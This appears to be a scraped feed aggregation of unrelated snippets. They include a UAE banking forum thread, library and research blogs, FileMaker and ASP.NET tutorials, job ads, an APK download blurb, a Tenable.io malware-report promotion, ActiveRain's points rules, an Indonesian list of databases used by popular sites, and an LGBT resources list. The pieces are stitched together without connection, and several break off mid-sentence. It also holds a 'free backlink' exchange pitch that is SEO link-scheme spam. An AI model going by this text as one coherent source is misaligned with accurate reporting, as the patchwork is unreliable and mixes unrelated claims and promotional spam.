    The lack of a central lending database = ppl can get into debt easily and with multiple banks without the banks knowing. But this isnt the banks fault. The lack of the data base is the system's fault, but no one forces all these morons to sign those loan agreements.

 You are right on this. Theoretically, a person can get multiple credit accounts from several institutions without being qualified for the aggregate of the limits. This would not happen in countries with an independent credit bureau because that person could be tracke and info shared between financial institutions. In the US, every citizen has a credit score which sets limits on the amount that can be borrowed.

    It simply isnt anyone else's fault if you cant manage your finances.

I agree with you on that, but it seems a lot of people get into trouble in the UAE and that trouble can cause very serious legal consequences. In my opinion, the banks are like drug pushers making easy credit available to most. Hell, I bought a 99,000AED car on 100% credit after just 90 days on the job. Was that dumb...yes! Would I do it again...no! That car is sold now and I currently free of debt, at least in the UAE. I know many that are way over their heads in credit balances and will have to be in the UAE many more years than they want.

But ultimately it was my decision as I rose to the bait and took the hook.The banks are enablers but it is ultimately the individual that is responsible to refuse the offer.

    But yeah, you added alot of "baharat" (Spices) to the story Ace.

I didn't intend on singling out NBAD. They have treated me quite well except for the online banking troubles. My post tended to drift toward the overall financial system in the UAE as seen by a retail customer.

You are/were obviously a bank employee. I appreciate the insight and if there is something I failed to understand, let me know and maybe I won't sprinkle as much "baharat" on my future posts about the rules here.

I just received an email today, 19 November, from the bank addressing my initial question I asked on 29 October, see below.

Email from Ace to the National Bank of Abu Dhabi, 29 October:

I am now blocked from my online account. I need this fixed as I have bills to pay. Your phone message says 24/7 service for the online accounts and I was informed I could not be helped after 11:00 PM as the technical service was closed.

Ever since the website has changed, there have been problems.


The "prompt" reply 3 weeks later, 19 November:

Dear Ace,
Thank you for your recent email.

You are kindly requested to reply the following to help us process this faster:
1. NBAD Account number:
2. PO Box number:       
3. Branch you received the password from:
4. Mobile/Telephone number:
5. NbadOnline User ID: 
6. time to be contacted :        
For any further assistance, please do not hesitate to contact us again on toll free 800 XXXX  from outside UAE) between 8:00 AM to 12:00 AM on all UAE working days (from Saturday to Thursday) or send us a reply email.
Thank you for using nbadOnline.
Back Office Person
Internet Banking Unit
National Bank of Abu Dhabi

I had better luck with the telephone help-line and the problem was solved 2 1/2 weeks ago through them.  Apparently the email guys are not only unaware that the problem was fixed a long time ago by a 1 1/2 hour call to the help-line, they are just getting around to looking at the problem 3 weeks after my initial email complaint. Unbelievable!!!!

I expect things to work once they are set up. Here  internet , banking , electricity and cable TV services are very fragile and I have experienced many unexpected shutdowns. I cringe when I have to enter the labyrinth of what is called "customer service" in Abu Dhabi. It has always meant a time consuming and frustrating experience trying to correct a situation that was not of my making.  

          Bye bye books   
My computer literacy moves forward in fits and starts. I'm above average for my age group in some things. On the other hand, it was only yesterday that I first used the resource "Hein Online," a web-based archive with PDF images of something close to every page of every law review ever published.

Previously, I'd either used LEXIS or Westlaw, the two longstanding online legal databases. These are not always the best way to retrieve scholarly legal articles. Their html reformatting is not nearly as readable or visually pleasing as the original published formatting, and they don't reproduce charts and tables. Also, of course, I'd go to the actual books, though it has been some time since I got my butt out of my office and into the library stacks.

When I did that yesterday, I learned that my institution has gotten rid of almost all back issues of legal periodicals predating 1990. (Not actually thrown away, thank goodness, but moved into offsite storage.) Hein Online made the books obsolete, in the library's view. I guess shelf space is too valuable to keep dusty ol' books around.

It's true that I can browse on line and then download and print stuff I "need" to have on paper -- I just don't read with as much comprehension on the computer, and I like to mark up the texts. The latter point meant that I needed to get photocopies of the old law reviews, and now I can just print out downloads much more conveniently (and at the cost of no more trees than photocopies).

But I have great nostalgia for my scholarly immersion experiences of sitting at a carrell deep in the library stacks surrounded by piles of old law reviews. That will never happen again -- not as long as I want to look at pre-1990 stuff, anyhow.

I wonder whether other libraries are actually getting rid of books -- throwing them away. That would be short-sighted. What if in the near future, our society undertakes major energy conservation measures, including placing restrictions on computing time?

I take consolation in thinking that, if the lights go out in a big way, then old legal scholarship won't be very important anyhow.
          Custom Function Database 15 - Copy/pasting groups of functions   

Moving forward with the Custom Function database project, we now have the opportunity to copy and paste our groups of custom functions. The trick to accomplishing this requires a modification to the singular copy/paste being used for a single custom function.

The database now needs to provide a list of functions, in the xml snippet format, to be copied to the clipboard. This is easily accomplished through the relationships and by modifying the original script.

If you’ve never had the problem where you needed to copy well structured data through a few relationships, then watching this video will give you some insight in the the various possible ways and the one way which may be the most simple when needing to copy that structured data to the clipboard.

Click the title or link to this article to view the video.

          Research: When It's Time to Dig In   
We've all seen them. Those legal thrillers or crime shows where the hero just can't find the one single detail that ties everything all together. And then they go to the library, sit down at a public computer, open up a search engine and, after a few quick keystrokes, find the answer that leads them to the villain, the secret lair, the unknown weakness and the pot-o-gold at the end of the rainbow. But research is rarely that easy.

I just finished the first draft for personal essay/memoir kind of thing. Although it's mostly based on things that happened to me, there are a couple of fine details I want to research and nail down before I even think about sending this thing out. One of them being the date of a concert I went to in the mid 1990's. I know the year. And it was snowing that night, so I know it was sometime between November and March. But beyond that I really don't remember.

So I spent a couple of hours digging through the electronic databases at work, accessing The Washington Post as well as some more local papers, looking for any mention of the specific concert tour. It wasn't a major stadium tour, but at the 9:30 Club in D.C. Not the current super-warehouse space, but the old, dingy bar near the Metro Center metro stop (oh how I miss that dirty place). I couldn’t find anything, so it became apparent that it wasn't a show Mark Jenkins or one of the other critics reviewed. But I thought I'd still find it listed in an events guide in old weekend sections or something. But the databases don't seem to capture any of that stuff----just the actual articles. In the end, I think I'll have to trek out to the one library in my library system that still has old issues of The Washington Post on microfiche, and go through the weekend sections week-by-week until I find what I need.

I was at writing conference once and heard Karey Joy Fowler talk about her process and how one of the greatest tools for her in writing historical fiction is going through the advertisements and personal ads to get a sense of the language, what people bought, ate and did for fun. Details like that are still getting left out with most of our digital tools. It just points out to me some of the limitations of using digital sources for research. They can be a wonderful time saver if they have what you want, but for those pieces that are a little more esoteric----and those are often the pieces that are the most fun-----you still have to get your hands dirty flipping through physical newspapers, magazines and microfiche.


          Urgent Hiring for Php Developer - Laravelsymfonymvc   
India - Strong knowledge of PHP frameworks such as Laravel, Symfony etc. depending on your technology stack. - Understanding of MVC design... patterns. - Knowledge of object oriented PHP programming. - Working knowledge of MySQL and other SQL/NoSQL databases and their declarative...
          AeroWeather v1.79 APK   

Download AeroWeather v1.79 APK from HabeEvil.com with direct download links,  Finally, the famous Aeroweather app is now available on Android! Get current and precise weather conditions (METAR) as well as weather forecasts (TAF), which are used by pilots for their flight preparations. You can choose worldwide airport weather stations from the built-in database by either […]

The post AeroWeather v1.79 APK appeared first on HabeEvil.

          Public Outreach Coordinator - Knox County Board of DD - Mount Vernon, OH   
Takes photos at events and build a database of images for future publications. Responsible for Knox & Coshocton County Outreach....
From Indeed - Tue, 20 Jun 2017 12:22:54 GMT - View all Mount Vernon, OH jobs
          Examining ASP.NET 2.0's Site Navigation - Part 5   
A Multipart Series on ASP.NET 2.0's Site Navigation
This article is one in a series of articles on ASP.NET 2.0's site navigation functionality.

  • Part 1 - shows how to create a simple site map using the default XML-based site map provider and how to display a TreeView and SiteMapPath (breadcrumb) based on the site map data.
  • Part 2 - explores programmatically accessing site map data through the SiteMap class; includes a thorough discussion of the SiteMapPath (breadcrumb) control.
  • Part 3 - examines how to use base the site map's contents on the currently logged in user and the authorization rules defined for the pages in the site map.
  • Part 4 - delves into creating a custom site map provider, specifically one that bases the site map on the website's physical, file system structure.
  • Part 5 - see how to customize the markup displayed by the navigation controls, and how to create your own custom navigation UI.
  • (Subscribe to this Article Series! )

    The site navigation features in ASP.NET 2.0 make it easy to define a site map and implement common navigation UI elements, such as a breadcrumb, treeview, and menu. Due to its use of the provide model, you can dictate how to serialize the site map. ASP.NET 2.0 ships with a default implementation that serializes site map information to an XML-formatted file (Web.sitemap, by default), but as we saw in Part 4 this logic can be customized to garner site map information directly from the file system or through a SQL Server database table. Site navigation can even be configured to use security trimming, which will remove those nodes in the site map for which the currently logged on user does not have authorization to view.

    The site map provider model and security trimming features are used to customize the set of site map nodes used by the navigation Web controls, and afford a great deal of customization. However, there are times where we may want to customize the rendered output of the navigation control based on the site map data. For example, maybe in our Menu control we want to display an icon next to each menu item depending on some classification defined for the menu item's corresponding site map node. Alternatively, the markup rendered by ASP.NET's built-in navigation controls may not suit our needs. Rather than displaying a TreeView or Menu, we may want to show the site navigation information in a bulleted list. Such functionality is possible by directly working with the SiteMap class.

    In this article we'll look at how to accomplish a hodgepodge of customizations when rendering the navigation UI controls. Read on to learn more!

              Examining ASP.NET 2.0's Site Navigation - Part 4   
    A Multipart Series on ASP.NET 2.0's Site Navigation
    This article is one in a series of articles on ASP.NET 2.0's site navigation functionality.

  • Part 1 - shows how to create a simple site map using the default XML-based site map provider and how to display a TreeView and SiteMapPath (breadcrumb) based on the site map data.
  • Part 2 - explores programmatically accessing site map data through the SiteMap class; includes a thorough discussion of the SiteMapPath (breadcrumb) control.
  • Part 3 - examines how to use base the site map's contents on the currently logged in user and the authorization rules defined for the pages in the site map.
  • Part 4 - delves into creating a custom site map provider, specifically one that bases the site map on the website's physical, file system structure.
  • (Subscribe to this Article Series! )

    The goal of ASP.NET's site navigation feature is to allow a developer to specify a site map that describes his website's logical structure. A site map is constructed of an arbitrary number of hierarchically-related site map nodes, which typical contain a name and URL. The site navigation API, which is available in the .NET Framework via the SiteMap class, has properties for accessing the root node in the site map as well as the "current" node (where the "current" node is the node whose URL matches the URL the visitor is currently on). As discussed in Part 2 of this article series, the data from the site map can be accessed programmatically or through the navigation Web controls (the SiteMapPath, TreeView, and Menu controls).

    The site navigation features are implemented using the provider model, which provides a standard API (the SiteMap class) but allows developers to plug in their own implementation of the API at runtime. ASP.NET 2.0 ships with a single default implementation, XmlSiteMapProvider, with which the developer can define the site map through an XML file (Web.sitemap); Part 1 of this article series looked at defining this XML file. However, our site's structure might already be specified by existing database data, or perhaps by the folders and files that makeup our website. Rather than having to mirror the database or file system structure in a Web.sitemap file, we can create a custom provider that exposes the database or file system information as a site map.

    Thanks to the provider model we can provide a custom implementation of the site navigation subsystem, but one that still is accessible through the SiteMap class. In essence, with a custom provider the SiteMap class and navigation Web controls will work exactly as they did with the XmlSiteMapProvider. The only difference will be that the site map information will be culled from our own custom logic, be it from a database, a Web service, the file system, or from whatever data store our application may require. In this article we'll look at how to create a custom site navigation provider and build a file system-based custom provider from the ground-up. Read on to learn more!
    Read More >

              TomTom amplia le mappe con MultiNet   
    Pubblicato in: ,

    TomTom ha annunciato un ampliamento del database di mappe con la nuova versione 2011.03 di MultiNet, che copre ben 34 km in 103 paesi ed è disponibile per le aziende.

    La versione 2011.03 di MultiNet…
              A Conceptual Paper on Factors That Affect Public Perceptions of Welfare   
    A Conceptual Paper on Factors That Affect Public Perceptions of Welfare Yarborough, Connie This is a conceptual paper to study the effects of external factors on public perceptions of social welfare. The study reviews literature on the history of social welfare during the presidencies of Franklin Roosevelt, Lyndon B. Johnson, and William Clinton. The paper goes on to analyze three factors that play role on perceptions. These factors are values, environmental factors (economics and politics), and the media. Studies and surveys from Gilens, Gilliam, Los Angeles Times, and the National Election study were analyzed and discussed throughout the paper in the context of factors that influence perceptions. The factors outlined in the paper are analyzed using the theoretical framework of symbolic-interactionism. Symbolic-interactionism states that people act toward things based on the meaning those things have to them; and these meanings are derived from social interaction and modified through interpretation (Blumer, 1969).The model is appropriate for this inquiry because it allows the reader to understand how public perceptions are influenced. Minimal biased methods were used for acquiring literature for the paper. A number of databases in fields such as sociology, social sciences, psychology, and economics were used to acquire literature on the topic. Methods for conducting future research on the effects of experience on perceptions and attitudes towards welfare are provided. The findings of the paper include the types of factors that play a role on perceptions (values, environmental factors, and media), what factor appears to be most influential (media) and whether public perceptions of welfare has changed over time. Conclusions from the literature are drawn that states that living in society plays a key role in how perceptions are made, but the individual’s interpretation of the information should be taken into consideration. The paper ends with recommendations on future research on how experience with welfare affects perceptions and attitudes towards welfare; and future research to better public perceptions of welfare.
              Why is my FileMaker Server showing authentication warnings for users when trying to connect to the related NRGship databases?   
    Seeing user authentication failed warnings in your FileMaker Server log is a common occurrence and there is no need to be alarmed.These warnings occur when your FileMaker database is related to th ...
              Comment on Organic Mascara Review by Karen   
    Just thought you might want to know, Hauschka isn't organic (his mascara tests moderately toxic as opposed to less toxic on the Cosmetics Database), and that both Nvey and Hauschka refuse to sign an agreement with the EWG. Both companies won't guarantee that they or their suppliers don't test on our animal friends, either. I continue my quest for truly organic AND ethical!!!! Thanks for your input, though.
              OpenOffice.org 4.0.1 PowerPC-Una suite di lusso che non ti costa nulla   

    Sono finiti i tempi in cui eri obbligato a pagare un prezzo proibitivo (o a procurarti una copia illegale) per avere una suite efficiente di programmi che ti permettesse di scrivere una lettera, creare una presentazione o utilizzare un foglio di calcolo. Adesso ci sono soluzioni totalmente gratuite, funzionanti e legali, tra le quali spicca OpenOffice.org.

    Basato nel codice di StarOffice, rilasciato liberamente da Sun Microsystems, questo pacchetto di applicazioni open source comprende Writer (processore testi), Calc (foglio di calcolo), Impress (presentazioni), Base (database), Math (formule matematiche) e Draw (grafiche vettoriali). La suite lavora con molti formati di documenti, è capace di esportare in PDF ed è pienamente compatibile con quelli più diffusi di Microsoft Office (tra cui .doc, .xls e .ppt).

    Tutte le applicazioni hanno un'interfaccia intuitiva, localizzata in italiano e molto simile a quella dei programmi MS Office, perciò non farai fatica per sentirti a casa. Funzionano, sono stabili, affidabili, totalmente gratuite. E la community di sviluppatori comincia a sfornare le prime estensioni Mac che ne aumentano le funzionalità. Toccare per credere? Ti convertirai.

    Giudizio complessivo
    Tutto quello che ti offrono le suite office a pagamento, non solo gratuitamente ma addirittura con alcune funzionalità più evolute, un'ottima stabilità, piena compatibilità con i formati standard e un'interfaccia intuitiva in italiano.

    Download OpenOffice.org 4.0.1 PowerPC in Softonic

              Bahasa Pemrograman Web Populer dan Database yang Digunakan    
    Anda penasaran, teknologi apa yang digunakan oleh layanan-layanan web populer di internet? Kinerja layanan mereka yang cepat, sajian informasi yang dinamis, dan tampilan yang interaktif bisa Anda contoh untuk Anda terapkan di website yang Anda kelola. Jika Anda sudah menggunakan teknologi ini, maka pada tahap awal, Anda sudah berada di jalur yang benar.

    Di balik halaman-halaman website mereka yang dinamis dan interaktif, ternyata bahasa pemrograman dan pengolah database yang digunakan pada server mereka adalah sebagai berikut:
    • Google: Pemrograman C, C++, Java, Python, dan PHP. Database menggunakan BigTable.
    • Facebook: Pemrograman PHP, C++, Java, Python, Erlang. Database menggunakan MySQL.
    • YouTube: Pemrograman C, Python, Java. Database menggunakan MySQL.
    • Yahoo: Pemrograman PHP. Database menggunakan MySQL.
    • Live: Pemrograman ASP.NET. Database menggunakan Microsoft SQL Server.
    • MSN: Pemrograman ASP.NET. Database menggunakan Microsoft SQL Server.
    • Wikipedia: Pemrograman PHP. Database menggunakan MySQL.
    • Blogger: Pemrograman Python. Database menggunakan BigTable.
    • Bing: Pemrograman ASP.NET. Database menggunakan Microsoft SQL Server.
    • Twitter: Pemrograman C++, Java, RoR, Scala. Database tidak diketahui.
    • Wordpress: Pemrograman PHP. Database menggunakan MySQL.
    • Amazon: Pemrograman Java, J2EE, C++, Perl. Database tidak diketahui.
    • eBay: Pemrograman Java, WebSphere, Servlets. Database menggunakan Oracle.
    • Linkedin: Pemrograman Java, Scala. Database tidak diketahui.

    Adapun teknologi untuk pemrograman client-side yang digunakan rata-rata adalah JavaScript dan Ajax. Adapun Flash hanya dipakai di Youtube. Kemungkinan Silverlight hanya dipakai di situs-situs Microsoft seperti Live, MSN, dan Bing.

              Jenis-jenis Database dan Teknologinya    
    Pada era komputer dan internet ini, peran database atau basis data sangat dominan. Hampir semua kegiatan administratif di perkantoran dan institusi kini diintegrasikan ke sistem komputasi dengan model database terpadu. Demikian juga, layanan-layanan online di internet juga tidak terlepas dari peran database. Lantas apakah jenis-jenis teknologi yang digunakan untuk mengelola database?

    Database Server

    Berikut ini adalah daftar jenis-jenis teknologi database, yang sebagian besar merupakan Relational Database Management System (RDBMS):
    • Apache Derby (sebelumnya dikenal sebagai IBM Cloudscape), merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh Apache Software Foundation. Lazim digunakan di program Java dan untuk pemrosesan transaksi online.
    • IBM DB2, merupakan aplikasi pengolah database yang dikembangkan IBM secara proprietary (komersial). DB2 terbagi menjadi 3 varian, yaitu DB2 untuk Linux - Unix - Windows, DB2 untuk z/OS (mainframe), dan DB2 untuk iSeries (OS/400).
    • Firebird, merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh Firebird Project. Lazim dijalankan di Linux, Windows dan berbagai varian Unix.
    • Microsoft SQL Server, merupakan aplikasi pengolah database yang dikembangkan oleh Microsoft dan bersifat proprietary (komersial),namun tersedia juga versi freeware-nya. Lazim digunakan di berbagai versi Microsoft Windows.
    • MySQL, merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh Oracle (sebelumnya Sun dan MySQL AB). Merupakan pengolah database yang paling banyak digunakan di dunia dan lazim diterapkan untuk aplikasi web.
    • Oracle, merupakan aplikasi pengolah database yang bersifat proprietary (komersial), dikembangkan oleh Oracle Corporation. Pengolah database ini terbagi dalam beberapa varian dengan segmen dan tujuan penggunaan yang berbeda-beda.
    • PostgreSQL atau Postgres, merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh PosgreSQL Global Development Group. Tersedia dalam berbagai platform sistem operasi seperti Linux, FreeBSD, Solaris, Windows, dan Mac OS.
    • SQLite, merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh D. Richard Hipp. Dikenal sebagai pengolah database yang sangat kecil ukuran programnya, sehingga lazim ditanamkan di berbagai aplikasi komputer, misalnya di web browser.
    • Sybase, merupakan aplikasi pengolah database yang bersifat proprietary (komersial), dikembangkan oleh SAP. Ditargetkan untuk pengembangan aplikasi mobile.
    • WebDNA, merupakan aplikasi pengolah database yang bersifat freeware, dikembangkan oleh WebDNA Software Corporation. Didesain untuk digunakan di web.
    • Redis, merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh Salvatore Sanfilippo (disponsori oleh VMware. Difungsikan untuk jaringan komputer.
    • MongoDB, merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh 10gen. Tersedia untuk berbagai platform sistem operasi dan dikenal telah digunakan oleh situs Foursquare, MTV Networks, dan Craigslist.
    • CouchDB, merupakan aplikasi pengolah database yang bersifat open source, dikembangkan oleh Apache Software Foundation. Difokuskan untuk digunakan di server web.

              Junior Database Administrator / Report Developer   
    RI-East Greenwich, We are currently engaged with a client who is seeking a Junior SQL Database Administrator / Developer on a full-time direct employee basis. In this role, the Database Administrator will: Assist in the maintenance, performance and uptime of SQL and other database instances in a Linux - UNIX environment. Create and modify bash scripts and Windows command scripts. Manage tablespace, storage allocatio
              Staying Ahead of the Curve   
    Tenable.io Malicious Code Prevention Report

    As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.

    Use Tenable.io to quickly address systems that are at risk

    Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.

    Malicious Code Prevention Report

    Malware scanning

    Tenable.io includes a customizable malware scan template where you can incorporate both good and bad known MD5 hashes, along with a hosts file whitelist. On Windows systems, hosts files contain commented lines of text that consist of two localhost address entries. Most systems will query local DNS servers to resolve domain names to IP addresses. Some organizations will add entries into hosts files for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system will use the entries within the hosts file first and bypass records within your DNS server.

    Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.

    Malware Scan template

    Enabling the File System Scanning option enables you to scan specific directories within your Windows environment such as the C:\Windows, C:\Program Files, and User Profile directories that are frequently used to install malware. You can also scan malware within directories such as C:\ProgramData that are hidden by default on Windows systems.

    Scanning files

    Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.

    The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution

    The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.

    Yara rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, Yara will examine systems for specific files that match values within the rules file.


    The Malicious Code Prevention report provides a comprehensive overview of systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware just to name a few.

    Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.

    Hosts with vulnerabilities that are exploitable by malware

    Tenable.io uses both active and passive methods to detect malicious content

    Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into website due to a cross-site scripting (XSS) or SQL injection vulnerability.

    Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.

    Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.

    Hosts interacting with known botnets

    Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.

    Anti-virus status

    Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.

    Outdated anti-virus details

    No organization is immune from vulnerabilities and attacks

    No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.

    Start with Tenable.io

    To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.

              Oracle XMLDB XQuery Update in Database Release   

    I just made use of the very cool OTN Virtual Developer Day Database site. In this environment you can follow OTN Developer Day sessions, for example, at home, while making use of all the material available on that site plus the downloadable Virtualbox OTN Developer Day Appliance. Despite you can choose for tracks like Java, [...]

    The post Oracle XMLDB XQuery Update in Database Release appeared first on AMIS Oracle and Java Blog.

              Autonomics to Modernize DB Administration   
    There is a clear trend to automate and enable computerized tasks to streamline and optimize administrative and maintenance tasks. Many database (DB) management tasks that today require oversight and hand-holding by Database Administrators (DBAs) can, over time, be turned over to intelligently automated software to manage. But automation is just the first step. With autonomic […]
              Call Center Representative   
    NY-Mineola, Duties: Determines requirements by working with customers. Answers inquiries by clarifying desired information; researching, locating, and providing information. Handles heavy inbound and outbound calls Resolves problems by clarifying issues; researching and exploring answers and escalating unresolved problems. Maintains call center database by entering information. Updates job knowledge by partic
              The ActiveRain Point System   
    ActiveRain awards points to our members as a way to motivate them to engage with others and share their expertise.  You can earn points through community events like entering a contest, taking a survey, attending a meet-up, but most of the points you accumulate will come from the daily interaction you have on ActiveRain.What makes ActiveRain different from any other online community is the willingness of agents and real estate professionals to help one another in their business and in life.  Face it… real estate is a tough gig and you need a strong support network to survive!This post will walk you through all of the essential elements of our scoring system. When Points Are AwardedWe have about 50 different “scoring events” that are running behind the scenes.  These events are constantly evolving based on feedback we get from the community.  Here are scoring events the "point buckets" that you'll see on your points page alignedNotice: ActiveRain changes the scoring system on occasion as we release new upgrades or respond to people abusing the system.  We'll do our best to keep this up-to-date, but please use this as a reference tool only. Blogging Points
    Scoring Events Points Frequency
    You published a new blog post 225 10 per week 
    Your blog post was featured 100 1 per day
    A member bookmarked your blog post 25 3 per day
    Your blog post received a new comment 6 50 per day
    A member "Liked" your blog post 5 25 per day
    A member re-blogged your post 25 1 per day
    You reblogged another member's post 25 1 per day
    A member subscribed to comments on your blog  0 N/A
     Commenting Points
    Scoring Events Points Frequency
    You commented on a blog post 25 20 per day
    You tagged a member in a comment   0 N/A
     Product Reviews
    Scoring Events Points Frequency
    You submitted a product review   50 1 per day
     Profile PointsWe have numerous scoring events for our members as they set up or enhance their profile page.  In general, you'll earn 25-100 points for every section the first time you update it. Q&A Points
    Scoring Events Points Frequency
    You published a new question 10 1 per day 
    Your question was featured 50 1 per day
    A member bookmarked your question 25 3 per day
    You answered another member's question 15 20 per day
    A member "Liked" your answer 10 5 per day
    Your question received an answer 0 N/A
    A member "Liked" your question 0 N/A
    A member subscribed to answers on your blog  0 N/A
    You tagged a member in an answer 0 N/A
    You "Liked" a question 0 N/A
     Invite Points
    Scoring Events Points Frequency
    Your invitation was accepted by someone you invite to ActiveRain   250 20 per day
     Other Points
    Scoring Events Points Frequency
    You logged in today 100 1 per day
    A member "Followed" you 50 5 per day
    You "Followed another member 10 5 per day
    You reported a confirmed spam question, answer, or comment   5 5 per day
    You bookmarked another member's blog post 0 N/A
    You "Liked" another member's blog post 0 N/A
     Points May be Deducted from Your AccountOur goal is to make our points a reward system, not to be punitive and deduct points all the time. That being said, there are certain scoring events that can be reversed (you lose the points).  Examples include: Deleting a blog post Deleting a comment Unfollowing a member We have a rule in the system stating that any points are locked in after six months. So, if you go in and delete an outdated blog post from 2012, you won’t be penalized.There are also times when we will deduct points from a member's account if we feel they are blatantly abusing the points system.View Your Points At Any TimeMembers can navigate to the "Points" page on their computer or phone to see how they are tracking on points this month and to see the total points accumulated on their account.The points are organized into smaller "buckets" so you quickly see where your engagement is strongest.Earn 10% of the Points for Every Person You InviteOne of the fastest ways to accumulate points on ActiveRain is by inviting new members and coaching them on how to engage within the community.When a member accepts your invitation, we attach them to your account in our database. At the end of each month, our system will award you a bonus equal to 10% of any points your invitees earned.  These points are awarded as a single lump sum.SummaryWe always points on ActiveRain to be a positive experience for you.  They should motivate you to engage with your peers and to share your secrets in the real estate industry’s top online community.  If you ever see something that feels out of line you are welcome to let us know about it.--- Keep Up In the Rain!
    Enter your email address: Delivered by FeedBurner

              FREE Quad Classifieds   
    Find A Quad, a database of all things quad and ATV for sale and wanted in the UK. The FREE online classifieds for quads and ATV's BUY or Sell yourquad for FREE visit our website today

    Free Backlink for your site

    This program is a free automatic backlinks exchange services and free web traffic from other users. Everyone knows how important backlinks to get a high pagerank. Here, we offer a backlink for free and very fast for your sites. Copy the html code first, and then paste to your website or blog. To view your backlink you can click the image link from your website or blog. And well... your website url done and will be displaying in last references.
    Here, we offer a free and fast backlink to your blogs or sites without register :) .  
    Copy the html code below,  paste in  your website or blog. To view your backlink you can click the image link from your website or blog. And  your website url  are listed in  last references. If any visitors click this image link from your website or blog, your url will be create automatically on our database.  Remeber if you remove the code from your site you link are removed from our database .

    Free Plugboard Link Banner Button :

     Banner 486x60


    Get a free plugboard!

    Banner 80x15

    Text Link

              Creating a MySQL Database for WordPress   
    What is MySQL database? A database refers to a collection of organized data. In the case of a website, the […]
              Support Groups and Organizations   



    Being gay, lesbian, bisexual or transgendered is perfectly normal and healthy. Your sexual orientation and gender identity make up?your personal composition. Sometimes, it takes time to figure out all of these sexual and gender feelings. It is okay to be unsure whether you are gay or straight or to be uncertain about whether you should come out. Remember that you are not alone. There are people out there with the same questions and concerns that you have. The following is a list of internet resources that provide valuable information to gay, lesbian, bisexual, or transgendered people about lifestyles, where to find support groups in your area, and various issues faced by GLBT people everyday.

    *PFLAG is a home for gay, lesbian, bisexual and transgendered people. PFLAG has chapters in over 460 communities across the nation along with help-lines you can call. They can help find a chapter near you, as well as answer important questions about pertinent issues in the homosexual community. PFLAG also supports, educates and advocates for equal civil rights for gay, lesbian, bisexual and trangendered people.

    The task force for same sex marriage has created a website devoted to defeating anti-same sex marriage proposals. It provides a means to contact government officials, view recent news articles, and read real-life stories pertaining to gay and lesbian marriages.

    The International Lesbian and Gay Association is a world-wide federation of national and local groups dedicated to achieving equal rights for lesbians, gays, bisexuals and transgendered people everywhere. It provides information pertaining to how to get involved in the liberation of GLBT's across the globe and information on government and public events, recent activities, and an email directory of members.

    This is a guide to social and support organizations for gay lifestyles that help people match their needs or interest with those of other gays.

    This is a project developed by advocates for GLBT youths. It includes sites pertaining to youth health issues, lives, stories, advocacy, sexual health and well-being, information on how and why to have safer sex, community, youth HIV, school life for high school and college students, youth group listings, facts and stories about coming out, resources, and support for young gay men, bi-youths, youths of color, transgendered youths, lesbian youths, deaf GLBT youths, and more.


    Finding out that a loved one is gay, lesbian, bisexual, or transgendered often triggers a difficult series of transitions away from past thought processes into new and more refined ones. Most people aren't prepared to hear, "I'm gay," from their loved ones. It is important to realize that many people have initial feelings of confusion when they are first introduced to this concept. Many may find themselves going through something similar to a grieving process with all the shock, denial, anger, guilt and sense of loss that accompanied the news. So if those are the feelings with which you're dealing, they're understandable. Statistics show that one in every ten people in this country and around the world is gay. Therefore, approximately one in four families has an immediate family member who is gay, lesbian or bisexual, and most people have at least one gay, lesbian, bisexual or transgendered member in their extended circle of friends and family.

